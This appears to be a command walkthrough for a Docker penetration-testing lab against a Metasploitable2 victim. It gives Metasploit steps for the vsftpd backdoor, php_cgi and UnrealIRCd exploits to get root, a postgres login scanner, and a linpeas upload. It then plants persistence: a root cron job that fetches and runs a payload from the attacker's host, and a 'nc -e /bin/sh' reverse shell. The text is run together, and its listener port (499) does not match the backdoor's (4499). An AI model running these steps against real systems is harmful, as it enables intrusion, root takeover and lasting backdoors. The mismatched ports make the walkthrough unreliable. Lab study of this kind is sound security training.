make up
make psmake logs container=meta2
make logs container=kali make access container=meta2
make access container=kaliIn each container, run:
ifconfig # you should see 172.20.0.3 for the attacker and 172.20.0.2 for the victim From kali, run:
nmap -F 172.20.0.2From kali:
nmap -sV -p 21 172.20.0.2msfconsole
search vsftpd
# 1 exploit/unix/ftp/vsftpd_234_backdoor
use 1
set rhosts 172.20.0.2
set rport 21
exploitNow to check previliges, directly type:
whoami #rootFrom kali:
msfconsole
search postgres
# 9 auxiliary/scanner/postgres/postgres_login
use 9
set rhosts 172.20.0.2
set STOP_ON_SUCCESS true
runmake downFrom kali:
We will run the script by exploiting a php vulnerability but from a non-privileged user
msfconsole
search php_cgi
use 0
set rhosts 172.20.0.2
exploit
# we get a meterpreter session
upload linpeas_linux_amd64 . # from here, we upload the linpeas script to the victim
shell # we open a shell in victim
ls # check file was uploaded successfully
chmod 777 linpeas_linux_amd64
./linpeas_linux_amd64 -a > out.txt
exitFrom meterpreter:
download out.txt
bg # Go back to msfconsoleFrom kali terminal:
less -r out.txt # Open linpeas file, search for /irc in the fileGo back to the session:
sessions -i* # list sessions
sessions -i 1 # go back to the first sessionFrom msfconsole:
search unrealirc
use 0
set RHOSTS 172.20.0.2
set LHOST 172.20.0.3
set payload cmd/unix/reverse
exploit
# this creates a shell
whoami # root
shellFrom root shell:
# Leaving a backdoor
echo '* * * * * root cd /tmp; wget 172.20.0.3/backdoor -O backdoor && chmod +x backdoor && ./backdoor' > /etc/cron.d/backdoorFrom another kali terminal:
# write a backdoor script
echo 'nc -e /bin/sh 172.20.0.3 4499' > backdoor
# serve script using http server
python3 -m http.server 80
From another kali terminal:
nc -nlvp 499
# waitGo back to the session:
sessions -i* # list sessions
sessions -i 1 # go back to the first session
